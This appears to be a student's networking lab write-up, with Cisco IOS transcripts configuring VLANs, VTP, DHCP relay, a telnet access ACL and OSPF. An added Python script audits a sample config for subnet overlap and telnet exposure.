│ flash.efz
│
└─BABEBE9B-5DF1-4707-AE63-67BC804ACC0
PC.xml
J:\ovo_8>
Week 18 Practical Training Assignment
Note: the branch requirement needs detailed configuration; the simplified configuration will appear on <h.dayi.ink> at the end of term. Because the cmd transcript has become too messy across versions, it is temporarily no longer maintained.
Version 0.9
The layout is messy; it is recommended to download the files and read the running-config directly.
Files
https://p.dabbit.net/blog/pic_bed/sharex/_pn-2024-06-27-15-48-28_Marten_Infatuated_Delirious.rar
Thursday requirements and assignment
Requirements: internal network
A company's internal network contains four VLANs: vlan10, vlan20, vlan30 and vlan100.
- The finance department is vlan10, named caiwu
- The technology department is vlan20, named jishu
- The management department is vlan30, named guanli
- The internal HTTP-SERVER sits alone in vlan100, named fuwuqi.
- Configure the basic network:
  1) Finance department subnet 192.168.1.0/24, gateway 192.168.1.254
  2) Technology department subnet 192.168.2.0/24, gateway 192.168.2.254
  3) Management department subnet 192.168.3.0/24, gateway 192.168.3.254
  4) Server subnet 172.16.1.0/24, gateway 172.16.1.254
  5) The link between R1 and SW1 uses addresses from 192.168.10.0/30
- All gateways must be on the internal core switch SW1, using SVI interfaces as gateways
- All internal PCs and servers must be able to reach each other
- Because staff are not skilled with computers, the finance, technology and management terminals obtain IP addresses via DHCP (addresses 1-100 of each subnet are reserved; leases start at 101), while the server is configured with a static IP because it must be reached at a fixed address. (The DHCP server is on the edge router R1; DHCP relay completes the address assignment.)
- Staff in the management department may manage the internal router and core switch via telnet; other departments may not. (Telnet management of the internal devices must be configured.)
Requirements: public network
Public network section
- R1 and R2 use 100.1.1.0/24; R2 and R3 use 124.126.100.0/24; R3 and R4 use 202.96.137.0/24; R3, the external HTTP-SERVER and the public PC use 124.126.200.0/24. (The gateway for the external HTTP-SERVER and the public PC is 124.126.200.254.)
- To ensure connectivity across the public network, R1, R2 and R3 run the OSPF dynamic routing protocol
- The public PC can reach the port 80 HTTP service of the internal HTTP-SERVER through port 8080 on R1
- There is a public server HTTP-SERVER at 124.126.200.10/24; internal users must be able to reach it. (R1 and R2 use the 124.126.100.0/24 subnet)
- There is a public DNS-SERVER at 113.100.2.56/24 with gateway 113.100.2.1/24; we ultimately want to reach the public http-server via the domain www.shixun.com and view the home page "a small page", whose content reads: welcome to study our course!
Requirements: branch
- Internal PC7 and PC8 are in vlan70 and vlan80 respectively
- The gateways of PC7 and PC8 are 192.168.70.254 and 192.168.80.254, located on router R4
- PC7 and PC8 must also be able to reach the external network (test by accessing the public HTTP-SERVER)
Topology


The final topology:

VLAN creation and configuration
Requirements: VLAN configuration
The company's internal network contains four VLANs, configured as follows:
| VLAN ID | Name | Department / purpose |
|---|---|---|
| 10 | caiwu | Finance department |
| 20 | jishu | Technology department |
| 30 | guanli | Management department |
| 100 | fuwuqi | Internal server (HTTP-SERVER) |
Core switch: create the VLANs
Switch>en
Switch#conf t
Enter configuration commands, one per line. End with CNTL/Z.
Switch(config)#host
Switch(config)#hostname
Switch(config)#hostname core
core(config)#vlan 10
core(config-vlan)#name caiwu
core(config-vlan)#vlan 20
core(config-vlan)#name jishu
core(config-vlan)#vlan 30
core(config-vlan)#name guanli
core(config-vlan)#vlan 100
core(config-vlan)#name fuwuqi
Core switch: VLAN information after configuration:

core#show vlan brief
VLAN Name Status Ports
---- -------------------------------- --------- -------------------------------
1 default active Fa0/1, Fa0/2, Fa0/3, Fa0/4
Fa0/5, Fa0/6, Fa0/7, Fa0/8
Fa0/9, Fa0/10, Fa0/11, Fa0/12
Fa0/13, Fa0/14, Fa0/15, Fa0/16
Fa0/17, Fa0/18, Fa0/19, Fa0/20
Fa0/21, Fa0/22, Fa0/23, Fa0/24
Gig0/1, Gig0/2
10 caiwu active
20 jishu active
30 guanli active
100 fuwuqi active
1002 fddi-default active
1003 token-ring-default active
1004 fddinet-default active
1005 trnet-default active
Core switch: configure VLAN distribution (VTP server)
On the core switch:
core(config)#vtp mode server
Device mode already VTP SERVER.
core(config)#vtp domain crazy-friday
Changing VTP domain name from NULL to crazy-friday
core(config)#vtp password crazy
Setting device VLAN database password to crazy
Core switch: configure VLAN addresses
Requirements
2. Configure the basic network:
1) Finance department subnet 192.168.1.0/24, gateway 192.168.1.254
2) Technology department subnet 192.168.2.0/24, gateway 192.168.2.254
3) Management department subnet 192.168.3.0/24, gateway 192.168.3.254
4) Server subnet 172.16.1.0/24, gateway 172.16.1.254
5) The link between R1 and SW1 uses addresses from 192.168.10.0/30
Configuration
Add the 4 VLAN interfaces and configure their IP addresses.
core(config)#int vlan 10
core(config-if)#ip addr 192.168.1.254 255.255.255.0
core(config-if)#no shut
core(config-if)#int vlan 20
core(config-if)#ip addr 192.168.2.254 255.255.255.0
core(config-if)#no shut
core(config-if)#int vlan 30
core(config-if)#ip addr 192.168.3.254 255.255.255.0
core(config-if)#no shut
core(config-if)#int vlan 100
core(config-if)#ip addr 172.16.1.254 255.255.255.0
core(config-if)#no shut
Summary of current interface state and IP configuration
Physical interfaces:
- FastEthernet0/1 to FastEthernet0/4: enabled and running (up/up)
- FastEthernet0/5: physically disconnected (down/down)
- GigabitEthernet0/1 and GigabitEthernet0/2: physically disconnected (down/down)
| VLAN ID | IP address | Status |
|---|---|---|
| 1 | unassigned | administratively down |
| 10 | 192.168.1.254 | up, line protocol down |
| 20 | 192.168.2.254 | up, line protocol down |
| 30 | 192.168.3.254 | up, line protocol down |
| 100 | 172.16.1.254 | up, line protocol down |

Company internal network: 3. All gateways must be on the internal core switch SW1, using SVI interfaces as gateways
Enable Layer 3 routing on SW1
core#conf t
Enter configuration commands, one per line. End with CNTL/Z.
core(config)#ip routing
Company internal network: configure VLAN synchronization on the access switches
Finance department switch
Switch>en
Switch#conf t
Enter configuration commands, one per line. End with CNTL/Z.
Switch(config)#vtp mode client
Setting device to VTP CLIENT mode.
Switch(config)#vtp domain crazy-friday
Changing VTP domain name from NULL to crazy-friday
Switch(config)#vtp password crazy
Setting device VLAN database password to crazy
Switch(config)#hostname finance-sw
finance-sw(config)#int fa0/4
finance-sw(config-if)#switchport mode trunk
The VLAN database has been synchronized successfully.
Assign interfaces to VLANs:
Assign all remaining interfaces to the VLAN:
finance-sw(config-if)#int range fa0/1,fa0/2,fa0/3,fa0/5-24
finance-sw(config-if-range)#sw mode access
finance-sw(config-if-range)#sw ac vlan 10
finance-sw(config-if-range)#do show vlan br
VLAN Name Status Ports
---- -------------------------------- --------- -------------------------------
1 default active Gig0/1, Gig0/2
10 caiwu active Fa0/1, Fa0/2, Fa0/3, Fa0/5
Fa0/6, Fa0/7, Fa0/8, Fa0/9
Fa0/10, Fa0/11, Fa0/12, Fa0/13
Fa0/14, Fa0/15, Fa0/16, Fa0/17
Fa0/18, Fa0/19, Fa0/20, Fa0/21
Fa0/22, Fa0/23, Fa0/24
20 jishu active
30 guanli active
100 fuwuqi active
1002 fddi-default active
1003 token-ring-default active
1004 fddinet-default active
1005 trnet-default active
finance-sw(config-if-range)#
Company internal network: management department switch
Switch>en
Switch#conf t
Enter configuration commands, one per line. End with CNTL/Z.
Switch(config)#hostname manage-sw
manage-sw(config)#int fa 0/1
manage-sw(config-if)#sw mode trunk
%LINEPROTO-5-UPDOWN: Line protocol on Interface FastEthernet0/1, changed state to down
%LINEPROTO-5-UPDOWN: Line protocol on Interface FastEthernet0/1, changed state to up
manage-sw(config-if)#do show vlan br
VLAN Name Status Ports
---- -------------------------------- --------- -------------------------------
1 default active Fa0/2, Fa0/3, Fa0/4, Fa0/5
Fa0/6, Fa0/7, Fa0/8, Fa0/9
Fa0/10, Fa0/11, Fa0/12, Fa0/13
Fa0/14, Fa0/15, Fa0/16, Fa0/17
Fa0/18, Fa0/19, Fa0/20, Fa0/21
Fa0/22, Fa0/23, Fa0/24, Gig0/1
Gig0/2
1002 fddi-default active
1003 token-ring-default active
1004 fddinet-default active
1005 trnet-default active
manage-sw(config-if)#
manage-sw(config-if)#vtp mode client
Setting device to VTP CLIENT mode.
manage-sw(config)#vtp domain crazy-friday
Domain name already set to crazy-friday.
manage-sw(config)#vtp password crazy
Setting device VLAN database password to crazy
manage-sw(config)#do show vlan br
VLAN Name Status Ports
---- -------------------------------- --------- -------------------------------
1 default active Fa0/2, Fa0/3, Fa0/4, Fa0/5
Fa0/6, Fa0/7, Fa0/8, Fa0/9
Fa0/10, Fa0/11, Fa0/12, Fa0/13
Fa0/14, Fa0/15, Fa0/16, Fa0/17
Fa0/18, Fa0/19, Fa0/20, Fa0/21
Fa0/22, Fa0/23, Fa0/24, Gig0/1
Gig0/2
10 caiwu active
20 jishu active
30 guanli active
100 fuwuqi active
1002 fddi-default active
1003 token-ring-default active
1004 fddinet-default active
1005 trnet-default active
manage-sw(config)#
Assign interfaces to VLANs
manage-sw(config)#int range fa0/2-fa0/24
manage-sw(config-if-range)#sw mode access
manage-sw(config-if-range)#sw ac vlan 30
manage-sw(config-if-range)#do show vlan br
VLAN Name Status Ports
---- -------------------------------- --------- -------------------------------
1 default active Gig0/1, Gig0/2
10 caiwu active
20 jishu active
30 guanli active Fa0/2, Fa0/3, Fa0/4, Fa0/5
Fa0/6, Fa0/7, Fa0/8, Fa0/9
Fa0/10, Fa0/11, Fa0/12, Fa0/13
Fa0/14, Fa0/15, Fa0/16, Fa0/17
Fa0/18, Fa0/19, Fa0/20, Fa0/21
Fa0/22, Fa0/23, Fa0/24
100 fuwuqi active
1002 fddi-default active
1003 token-ring-default active
1004 fddinet-default active
1005 trnet-default active
manage-sw(config-if-range)#
Company internal network: technology department switch
Switch>en
Switch#conf t
Enter configuration commands, one per line. End with CNTL/Z.
Switch(config)#hostname tech-sw
tech-sw(config)#vtp mode client
Setting device to VTP CLIENT mode.
tech-sw(config)#vtp domain crazy-friday
Changing VTP domain name from NULL to crazy-friday
tech-sw(config)#vtp password crazy
Setting device VLAN database password to crazy
tech-sw(config)#do show vlan br
VLAN Name Status Ports
---- -------------------------------- --------- -------------------------------
1 default active Fa0/1, Fa0/2, Fa0/3, Fa0/4
Fa0/5, Fa0/6, Fa0/7, Fa0/8
Fa0/9, Fa0/10, Fa0/11, Fa0/12
Fa0/13, Fa0/14, Fa0/15, Fa0/16
Fa0/17, Fa0/18, Fa0/19, Fa0/20
Fa0/21, Fa0/22, Fa0/23, Fa0/24
Gig0/1, Gig0/2
1002 fddi-default active
1003 token-ring-default active
1004 fddinet-default active
1005 trnet-default active
tech-sw(config)#int
%LINK-3-UPDOWN: Interface FastEthernet0/1, changed state to down
%LINEPROTO-5-UPDOWN: Line protocol on Interface FastEthernet0/1, changed state to down
%LINK-5-CHANGED: Interface GigabitEthernet0/1, changed state to up
%LINEPROTO-5-UPDOWN: Line protocol on Interface GigabitEthernet0/1, changed state to up
% Incomplete command.
tech-sw(config)#int g0/1
tech-sw(config-if)#sw mode tr
tech-sw(config-if)#sw mode trunk
%LINEPROTO-5-UPDOWN: Line protocol on Interface GigabitEthernet0/1, changed state to down
%LINEPROTO-5-UPDOWN: Line protocol on Interface GigabitEthernet0/1, changed state to up
tech-sw(config-if)#dis vlan br
tech-sw(config-if)#do show vlan br
VLAN Name Status Ports
---- -------------------------------- --------- -------------------------------
1 default active Fa0/1, Fa0/2, Fa0/3, Fa0/4
Fa0/5, Fa0/6, Fa0/7, Fa0/8
Fa0/9, Fa0/10, Fa0/11, Fa0/12
Fa0/13, Fa0/14, Fa0/15, Fa0/16
Fa0/17, Fa0/18, Fa0/19, Fa0/20
Fa0/21, Fa0/22, Fa0/23, Fa0/24
Gig0/2
1002 fddi-default active
1003 token-ring-default active
1004 fddinet-default active
1005 trnet-default active
tech-sw(config-if)#do show vlan br
VLAN Name Status Ports
---- -------------------------------- --------- -------------------------------
1 default active Fa0/1, Fa0/2, Fa0/3, Fa0/4
Fa0/5, Fa0/6, Fa0/7, Fa0/8
Fa0/9, Fa0/10, Fa0/11, Fa0/12
Fa0/13, Fa0/14, Fa0/15, Fa0/16
Fa0/17, Fa0/18, Fa0/19, Fa0/20
Fa0/21, Fa0/22, Fa0/23, Fa0/24
Gig0/2
1002 fddi-default active
1003 token-ring-default active
1004 fddinet-default active
1005 trnet-default active
tech-sw(config-if)#do show vlan br
VLAN Name Status Ports
---- -------------------------------- --------- -------------------------------
1 default active Fa0/1, Fa0/2, Fa0/3, Fa0/4
Fa0/5, Fa0/6, Fa0/7, Fa0/8
Fa0/9, Fa0/10, Fa0/11, Fa0/12
Fa0/13, Fa0/14, Fa0/15, Fa0/16
Fa0/17, Fa0/18, Fa0/19, Fa0/20
Fa0/21, Fa0/22, Fa0/23, Fa0/24
Gig0/2
10 caiwu active
20 jishu active
30 guanli active
100 fuwuqi active
1002 fddi-default active
1003 token-ring-default active
1004 fddinet-default active
1005 trnet-default active
tech-sw(config-if)#int range fa0/1-24
tech-sw(config-if-range)#sw mode access
tech-sw(config-if-range)#sw ac vlan 30
tech-sw(config-if-range)#sw ac vlan 20
tech-sw(config-if-range)#do show vlan br
VLAN Name Status Ports
---- -------------------------------- --------- -------------------------------
1 default active Gig0/2
10 caiwu active
20 jishu active Fa0/1, Fa0/2, Fa0/3, Fa0/4
Fa0/5, Fa0/6, Fa0/7, Fa0/8
Fa0/9, Fa0/10, Fa0/11, Fa0/12
Fa0/13, Fa0/14, Fa0/15, Fa0/16
Fa0/17, Fa0/18, Fa0/19, Fa0/20
Fa0/21, Fa0/22, Fa0/23, Fa0/24
30 guanli active
100 fuwuqi active
1002 fddi-default active
1003 token-ring-default active
1004 fddinet-default active
1005 trnet-default active
tech-sw(config-if-range)#
Company intranet: Server switch
Switch#en
Switch#conf t
Enter configuration commands, one per line. End with CNTL/Z.
Switch(config)#hostname server-sw
server-sw(config)#int g0/1
server-sw(config-if)#sw mode tr
server-sw(config-if)#sw mode trunk
%LINEPROTO-5-UPDOWN: Line protocol on Interface GigabitEthernet0/1, changed state to down
%LINEPROTO-5-UPDOWN: Line protocol on Interface GigabitEthernet0/1, changed state to up
server-sw(config-if)#dis vlan br
server-sw(config-if)#do show vlan br
VLAN Name Status Ports
---- -------------------------------- --------- -------------------------------
1 default active Fa0/1, Fa0/2, Fa0/3, Fa0/4
Fa0/5, Fa0/6, Fa0/7, Fa0/8
Fa0/9, Fa0/10, Fa0/11, Fa0/12
Fa0/13, Fa0/14, Fa0/15, Fa0/16
Fa0/17, Fa0/18, Fa0/19, Fa0/20
Fa0/21, Fa0/22, Fa0/23, Fa0/24
Gig0/2
1002 fddi-default active
1003 token-ring-default active
1004 fddinet-default active
1005 trnet-default active
server-sw(config-if)#vtp mode client
Setting device to VTP CLIENT mode.
server-sw(config)#vtp domain crazy-friday
Domain name already set to crazy-friday.
server-sw(config)#vtp password crazy
Setting device VLAN database password to crazy
server-sw(config)#do show vlan br
VLAN Name Status Ports
---- -------------------------------- --------- -------------------------------
1 default active Fa0/1, Fa0/2, Fa0/3, Fa0/4
Fa0/5, Fa0/6, Fa0/7, Fa0/8
Fa0/9, Fa0/10, Fa0/11, Fa0/12
Fa0/13, Fa0/14, Fa0/15, Fa0/16
Fa0/17, Fa0/18, Fa0/19, Fa0/20
Fa0/21, Fa0/22, Fa0/23, Fa0/24
Gig0/2
10 caiwu active
20 jishu active
30 guanli active
100 fuwuqi active
1002 fddi-default active
1003 token-ring-default active
1004 fddinet-default active
1005 trnet-default active
server-sw(config)#int g0/2
server-sw(config-if)#sw mode ac
server-sw(config-if)#sw ac vlan 100
server-sw(config-if)#do show vlan b
server-sw(config-if)#do show vlan br
VLAN Name Status Ports
---- -------------------------------- --------- -------------------------------
1 default active Fa0/1, Fa0/2, Fa0/3, Fa0/4
Fa0/5, Fa0/6, Fa0/7, Fa0/8
Fa0/9, Fa0/10, Fa0/11, Fa0/12
Fa0/13, Fa0/14, Fa0/15, Fa0/16
Fa0/17, Fa0/18, Fa0/19, Fa0/20
Fa0/21, Fa0/22, Fa0/23, Fa0/24
10 caiwu active
20 jishu active
30 guanli active
100 fuwuqi active Gig0/2
1002 fddi-default active
1003 token-ring-default active
1004 fddinet-default active
1005 trnet-default active
server-sw(config-if)#
Company intranet: Server IP configuration
- IP: 172.16.1.10/24
- Gateway: 172.16.1.254
- DNS: temporary: 113.100.2.56

Company intranet: 2.5: 5) The interconnect between R1 and SW1 uses addresses from 192.168.10.0/30
Core switch:
core#conf t
Enter configuration commands, one per line. End with CNTL/Z.
core(config)#vlan 1000
core(config-vlan)#name R1-SW1-Interconnect
core(config-vlan)#interface vlan 1000
core(config-if)#
%LINK-5-CHANGED: Interface Vlan1000, changed state to up
core(config-if)#ip address 192.168.10.2 255.255.255.252
core(config-if)#no shutdown
core(config-if)#interface GigabitEthernet0/0
core(config-if)#switchport mode access
core(config-if)#switchport access vlan 1000
core(config-if)#
%LINEPROTO-5-UPDOWN: Line protocol on Interface Vlan1000, changed state to up
no shut
core(config-if)#no shut
# configure the static default route
core(config-if)#ip route 0.0.0.0 0.0.0.0 192.168.10.1
Router
Router>en
Router#conf t
Enter configuration commands, one per line. End with CNTL/Z.
Router(config)#int g0/0
Router(config-if)#ip address 192.168.10.1 255.255.255.252
Router(config-if)#no shutdown
# static route to the internal subnets
Router(config-if)#ip route 192.168.0.0 255.255.0.0 192.168.10.2
Company intranet: 4. Enable connectivity between all intranet PCs and the server
Allow the VLANs on the trunks so that the VLAN IP subnets can reach each other
server-sw>en
server-sw#conf t
Enter configuration commands, one per line. End with CNTL/Z.
server-sw(config)#int g0/1
server-sw(config-if)#switchport trunk allowed vlan 10,20,30,100
finance-sw>en
finance-sw#conf t
Enter configuration commands, one per line. End with CNTL/Z.
finance-sw(config)#int f0/4
finance-sw(config-if)#switchport trunk allowed vlan 10,20,30,100
manage-sw#conf t
Enter configuration commands, one per line. End with CNTL/Z.
manage-sw(config)#int fa0/1
manage-sw(config-if)#switchport trunk allowed vlan 10,20,30,100
tech-sw>en
tech-sw#conf t
Enter configuration commands, one per line. End with CNTL/Z.
tech-sw(config)#int g0/1
tech-sw(config-if)#switchport trunk allowed vlan 10,20,30,100
Core switch:
core#conf t
Enter configuration commands, one per line. End with CNTL/Z.
core(config)#int range g0/1,fa0/1-3
core(config-if-range)#switchport trunk allowed vlan 10,20,30,100
Test from the server
ping 172.16.1.254

ping 192.168.1.254
C:\>
C:\>ping 192.168.1.254
Pinging 192.168.1.254 with 32 bytes of data:
Reply from 192.168.1.254: bytes=32 time<1ms TTL=255
Reply from 192.168.1.254: bytes=32 time<1ms TTL=255
Ping statistics for 192.168.1.254:
Packets: Sent = 2, Received = 2, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
Minimum = 0ms, Maximum = 0ms, Average = 0ms
Control-C
ping 192.168.2.254
C:\>ping 192.168.2.254
Pinging 192.168.2.254 with 32 bytes of data:
Reply from 192.168.2.254: bytes=32 time<1ms TTL=255
Ping statistics for 192.168.2.254:
Packets: Sent = 1, Received = 1, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
Minimum = 0ms, Maximum = 0ms, Average = 0ms
Control-C
ping 192.168.3.254
C:\>ping 192.168.3.254
Pinging 192.168.3.254 with 32 bytes of data:
Reply from 192.168.3.254: bytes=32 time<1ms TTL=255
Ping statistics for 192.168.3.254:
Packets: Sent = 1, Received = 1, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
Minimum = 0ms, Maximum = 0ms, Average = 0ms
Control-C
ping 192.168.1.10

Company intranet: 5. Because the intranet staff are not skilled computer users, provide a DHCP server
Edge router
Router(config)#ip dhcp excluded-address 192.168.1.1 192.168.1.100
Router(config)#ip dhcp excluded-address 192.168.2.1 192.168.2.100
Router(config)#ip dhcp excluded-address 192.168.3.1 192.168.3.100
Router(config)#ip dhcp pool VLAN10-POOL
Router(dhcp-config)#network 192.168.1.0 255.255.255.0
Router(dhcp-config)#default-router 192.168.1.254
Router(dhcp-config)#dns-server 113.100.2.56
Router(dhcp-config)#exit
Router(config)#ip dhcp pool VLAN20-POOL
Router(dhcp-config)#network 192.168.2.0 255.255.255.0
Router(dhcp-config)#default-router 192.168.2.254
Router(dhcp-config)#dns-server 113.100.2.56
Router(dhcp-config)#exit
Router(config)#ip dhcp pool VLAN30-POOL
Router(dhcp-config)#network 192.168.3.0 255.255.255.0
Router(dhcp-config)#default-router 192.168.3.254
Router(dhcp-config)#dns-server 113.100.2.56
Router(dhcp-config)#exit
DHCP relay
core(config)#int vlan 10
core(config-if)#ip helper-address 192.168.10.1
core(config-if)#int vlan 20
core(config-if)#ip helper-address 192.168.10.1
core(config-if)#int vlan 30
core(config-if)#ip helper-address 192.168.10.1
Test:






Company intranet: 6. Allow staff of the intranet management department to manage the intranet router and core switch via telnet; other departments may not manage the router and switches via telnet. (Telnet management of the intranet devices must be configured)
This may still have problems. Here we take the "intranet management department" to be the technical department; it might be the management department instead.
Create VLAN 500 for management and configure an ACL
- Core switch: 192.168.20.10
- Router: 192.168.10.1
Core switch:
core#configure terminal
core(config)#vlan 500
core(config-vlan)#name tech-admin
core(config-vlan)#exit
core(config)#interface vlan 500
core(config-if)#ip address 192.168.2.1 255.255.255.0
core(config-if)#no shutdown
core(config-if)#exit
core(config)#ip access-list standard TELNET-ACL
core(config-std-nacl)#permit 192.168.2.0 0.0.0.255
core(config-std-nacl)#deny any
core(config-std-nacl)#exit
core(config)#line vty 0 4
core(config-line)#access-class TELNET-ACL in
core(config-line)#exit
core(config)#interface range g0/1-2,fa0/1-3
core(config-if-range)#switchport mode trunk
core(config-if-range)#switchport trunk allowed vlan add 500
core(config-if-range)#exit
core(config)#ip route 192.168.2.0 255.255.255.0 vlan 500
core(config)#end
core#copy running-config startup-config
Router:
Router#configure terminal
Router(config)#ip access-list standard TELNET-ACL
Router(config-std-nacl)#permit 192.168.2.0 0.0.0.255
Router(config-std-nacl)#deny any
Router(config-std-nacl)#exit
Router(config)#line vty 0 4
Router(config-line)#access-class TELNET-ACL in
Router(config-line)#exit
Technical department switch:
tech-sw#conf t
Enter configuration commands, one per line. End with CNTL/Z.
tech-sw(config)#interface vlan 500
tech-sw(config-if)#
%LINK-5-CHANGED: Interface Vlan500, changed state to up
tech-sw(config-if)#ip address 192.168.20.120 255.255.255.0
tech-sw(config-if)#no shut
tech-sw(config-if)#interface g0/1
tech-sw(config-if)#switchport trunk allowed vlan add 500
tech-sw(config-if)#username KFC4 password KFC4
tech-sw(config)#line vty 0 4
tech-sw(config-line)#login local
tech-sw(config-line)#transport input telnet
Only the technical department can access:
Router:
Other departments are denied.
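As an added example (not code from the page or the lab), this Python audit parses a constructed running-config that mirrors the management-VLAN and TELNET-ACL settings above and reports what a reviewer would check before trusting telnet-based management: SVI subnets that overlap, vty lines with no access-class, permit entries wider than the management subnet, and telnet still enabled as the transport. The Vlan20 address 192.168.2.254 is assumed from the DHCP default-router configured earlier on the page.

```python
import ipaddress
import re

# Constructed sample (not the page's own file): a trimmed running-config that
# mirrors the telnet-management section above. The Vlan20 address is assumed
# from the DHCP default-router 192.168.2.254 configured earlier on the page.
CORE_CONFIG = """\
hostname core
!
interface Vlan20
 ip address 192.168.2.254 255.255.255.0
!
interface Vlan500
 ip address 192.168.2.1 255.255.255.0
!
ip access-list standard TELNET-ACL
 permit 192.168.2.0 0.0.0.255
 deny any
!
line vty 0 4
 access-class TELNET-ACL in
 transport input telnet
"""


def parse(config):
    """One pass over an IOS-style config: SVI addresses, standard ACLs, vty settings."""
    svis, acls = {}, {}
    vty = {"access_class": None, "transports": []}
    section = None  # ("if", name) | ("acl", name) | ("vty",) | None
    for raw in config.splitlines():
        line = raw.strip()
        if not line or line.startswith("!"):
            continue
        if not raw.startswith(" "):  # start of a new top-level block
            words = line.split()
            if line.startswith("interface "):
                section = ("if", words[1])
            elif line.startswith("ip access-list standard "):
                section = ("acl", words[3])
                acls[words[3]] = []
            elif line.startswith("line vty"):
                section = ("vty",)
            else:
                section = None
            continue
        if section is None:
            continue
        if section[0] == "if":
            m = re.match(r"ip address (\S+) (\S+)$", line)
            if m:
                svis[section[1]] = ipaddress.ip_interface(f"{m[1]}/{m[2]}")
        elif section[0] == "acl":
            action, *rest = line.split()
            if rest == ["any"]:
                net = ipaddress.ip_network("0.0.0.0/0")
            elif rest[0] == "host":
                net = ipaddress.ip_network(f"{rest[1]}/32")
            else:  # "A.B.C.D wildcard": invert the wildcard into a netmask
                netmask = 0xFFFFFFFF ^ int(ipaddress.ip_address(rest[1]))
                net = ipaddress.ip_network(
                    f"{rest[0]}/{ipaddress.ip_address(netmask)}", strict=False)
            acls[section[1]].append((action, net))
        elif section[0] == "vty":
            m = re.match(r"access-class (\S+) in", line)
            if m:
                vty["access_class"] = m[1]
            m = re.match(r"transport input (.+)", line)
            if m:
                vty["transports"] = m[1].split()
    return svis, acls, vty


def audit(config, mgmt_net):
    """Return findings for management access; mgmt_net is the only subnet that
    should be allowed to reach the vty lines."""
    mgmt_net = ipaddress.ip_network(mgmt_net)
    svis, acls, vty = parse(config)
    findings = []
    names = sorted(svis)
    for i, a in enumerate(names):
        for b in names[i + 1:]:
            if svis[a].network.overlaps(svis[b].network):
                findings.append(f"overlap: {a} {svis[a]} and {b} {svis[b]}")
    if vty["access_class"] is None:
        findings.append("vty: no access-class, any source may attempt to log in")
    else:
        for action, net in acls.get(vty["access_class"], []):
            if action == "permit" and not net.subnet_of(mgmt_net):
                findings.append(f"vty acl: permits {net}, wider than {mgmt_net}")
    if "telnet" in vty["transports"]:
        findings.append("vty: telnet is plaintext, prefer 'transport input ssh'")
    return findings
```

Run `audit(CORE_CONFIG, "192.168.2.0/24")` to see the two findings the sample produces: VLAN 500's 192.168.2.0/24 collides with the VLAN 20 subnet already handed out by DHCP, and the vty transport is still telnet.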

Public network: Requirements
- R1 to R2 uses the 100.1.1.0/24 segment, R2 to R3 uses 124.126.100.0/24, R3 to R4 uses 202.96.137.0/24, and R3 to the external HTTP-SERVER and the public PC uses 124.126.200.0/24. (The gateway of the external HTTP-SERVER and the public PC is 124.126.200.254)
- To ensure communication across the public network, R1, R2 and R3 run the OSPF dynamic routing protocol
- The public PC can reach the HTTP service on port 80 of the intranet HTTP-SERVER through port 8080 on R1
- There is a public server HTTP-SERVER at 124.126.200.10/24; intranet users need to be able to reach it. (R1 and R2 use the 124.126.100.0/24 segment)
- There is a public DNS-SERVER at 113.100.2.56/24 with gateway 113.100.2.1/24; we ultimately want to reach the public http-server via the domain www.shixun.com and view the home page "a small page", whose content reads: welcome to study our course!
Public network: 1. IP configuration
R1-IP:
IP addresses:
| Interface | IP Address | Subnet Mask | Status |
|---|---|---|---|
| GigabitEthernet0/1 | 100.1.1.1 | 255.255.255.0 | Up |
Router>en
Router#conf t
Enter configuration commands, one per line. End with CNTL/Z.
Router(config)#int g0/1
Router(config-if)#ip address 100.1.1.1 255.255.255.0
Router(config-if)#no shut
%LINK-5-CHANGED: Interface GigabitEthernet0/1, changed state to up
Router(config-if)#router ospf 1
Router(config-router)#network 100.1.1.0 0.0.0.255 area 0
Router(config-router)#hostname r1
r1(config)#
R2-IP:
IP addresses:
| Interface | IP Address | Subnet Mask | Status |
|---|---|---|---|
| GigabitEthernet0/0 | 100.1.1.2 | 255.255.255.0 | - |
Router>en
Router#conf t
Enter configuration commands, one per line. End with CNTL/Z.
Router(config)#hostname r2
r2(config)#int g0/0
r2(config-if)#ip address 100.1.1.2 255.255.255.0
r2(config-if)#no shut
%LINK-5-CHANGED: Interface GigabitEthernet0/0, changed state to up
%LINEPROTO-5-UPDOWN: Line protocol on Interface GigabitEthernet0/0, changed state to up
r2(config-if)#int g0/1
r2(config-if)#ip address 124.126.100.1 255.255.255.0
r2(config-if)#no shut
%LINK-5-CHANGED: Interface GigabitEthernet0/1, changed state to up
# configure OSPF
r2(config-if)#router ospf 1
r2(config-router)#network 100.1.1.0 0.0.0.255 area 0
r2(config-router)#network 124.126.100.0 0.0.0.255 area 0
R3:
Router>en
Router#conf t
Enter configuration commands, one per line. End with CNTL/Z.
Router(config)#hostname r3
r3(config)#int g0/0
r3(config-if)#ip address 124.126.100.2 255.255.255.0
r3(config-if)#no shut
%LINK-5-CHANGED: Interface GigabitEthernet0/0, changed state to up
%LINEPROTO-5-UPDOWN: Line protocol on Interface GigabitEthernet0/0, changed state to up
r3(config-if)#int g0/1
r3(config-if)#ip address 202.96.137.1 255.255.255.0
r3(config-if)#no shut
%LINK-5-CHANGED: Interface GigabitEthernet0/1, changed state to up
r3(config-if)#int g0/2
r3(config-if)#ip address 124.126.200.254 255.255.255.0
r3(config-if)#no shut
%LINK-5-CHANGED: Interface GigabitEthernet0/2, changed state to up
%LINEPROTO-5-UPDOWN: Line protocol on Interface GigabitEthernet0/2, changed state to up
# configure OSPF
r3(config-if)#router ospf 1
r3(config-router)#network 124.126.100.0 0.0.0.255 area 0
r3(config-router)#network 202.96.137.0 0.0.0.255 area 0
r3(config-router)#network 124.126.200.0 0.0.0.255 area 0
R4:
Router>en
Router#conf t
Enter configuration commands, one per line. End with CNTL/Z.
Router(config)#hostname r4
r4(config)#int g0/0
r4(config-if)#ip addr 202.96.137.2 255.255.255.0
r4(config-if)#no shut
Current routing table:
r1#show ip route
Codes: L - local, C - connected, S - static, R - RIP, M - mobile, B - BGP
D - EIGRP, EX - EIGRP external, O - OSPF, IA - OSPF inter area
N1 - OSPF NSSA external type 1, N2 - OSPF NSSA external type 2
E1 - OSPF external type 1, E2 - OSPF external type 2, E - EGP
i - IS-IS, L1 - IS-IS level-1, L2 - IS-IS level-2, ia - IS-IS inter area
* - candidate default, U - per-user static route, o - ODR
P - periodic downloaded static route
Gateway of last resort is not set
100.0.0.0/8 is variably subnetted, 2 subnets, 2 masks
C 100.1.1.0/24 is directly connected, GigabitEthernet0/1
L 100.1.1.1/32 is directly connected, GigabitEthernet0/1
124.0.0.0/24 is subnetted, 2 subnets
